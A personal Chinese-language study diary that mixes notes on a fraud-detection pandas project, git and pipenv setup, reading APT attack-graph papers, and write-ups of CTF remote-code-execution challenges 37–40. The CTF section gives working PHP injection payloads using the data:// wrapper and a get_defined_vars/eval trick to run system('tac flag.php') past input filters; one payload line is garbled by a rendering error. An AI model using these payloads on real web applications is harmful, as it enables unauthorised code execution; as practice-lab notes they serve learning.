G1D14fraud&git&pipenv&df操作&APT论文&RCE37-40&服务器搭建

一、fraud

突然发现电脑上还没有python编译器，xswl，快装一下

（一）git操作

（二）git中分支的作用

（三）虚拟环境

1、pip install后的包一般放在哪里
lib/site-packages下
真的是欸！！不用担心装在c盘啦

（四）代码本身

1、df.groupby.agg用法
df.groupby(“phone_no_m”)[“call_dur”].agg(call_dur_mean=“mean”)
2、代码开始动啦！开心！

3、df.drop_duplicates()使用
subset:列名，默认保留所有
keep：first/last/false
4、pd.merge

5、df.fillna()

6、总结

（1）使用git
（2）使用pipenv
（3）学习一些基本的df处理
（4）跑了预处理提取特征代码，并对源代码进行修改：
a.删除对区县特征的提取
b.将null值补全

下了个必应每日壁纸，开心！！！
中午给我的youyou（战99）贴了一个小时的mo，没吃午饭，现在1421，开始学习啦！先花一个小时，总结一下之前的models

二、APT论文阅读

（一）复习APT model

1、AttacKG

----1544读完了，也试着在下载代码，刚刚读的有点心慌，但是还是看完了哈哈
fatal: unable to access
git遇到错误‘
就好了~
git config --global --unset https.proxy

2、全都看完啦~也做好了总结

—2108开完会啦~还看了会知识图谱，更加理解它偏向于符号主义了

现在快去看看rce吧！！

三、CTF

（一）RCE

1、37：eval变为include

（1）不能写?c=KaTeX parse error: Expected 'EOF', got '&' at position 9: _GET[1];&̲1=flag.php。因为in…_GET[1]当成字符串解析
（2）用伪协议
data为协议，后面直接当作php代码执行
自己写的时候别忘了system()哦~
?c=data://text/plain,

2、38：过滤php，无法使用为协议

（1）使用=替换php，短标签
(2)注意下面左括号旁边的”=“
?c=data://text/plain,<?=system(‘tac fla?.ph?’);?>

3、39：没有echo回显+强制加后缀

?c=data://text/plain,
也不影响，因为到

4、40：过滤了一堆符号，不能用$

（1）试着打印变量，看看能不能拿到东西
print_r(get_defined_vars());
（2）用next拿到数组
（3）拿到数组值
array_pop
（4）将print_r换为执行eval()

?c=eval(array_pop(next(get_defined_vars())));
post：
1=system(‘tac flag.php’);

因为过滤了一堆东西，所以尝试打印变量，看看有没有post方法。如果有的话，看看能不能拿到通过post方法传的值，然后执行该值即可。所以原链接中并没有标点符号，标点符号在post传的数据之中。

（二）安装环境

22点了，还有一点时间，装一下环境
1、配置host域名欺骗
www.f.com
www.k.com
2、配置虚拟机
原因：访问多个网站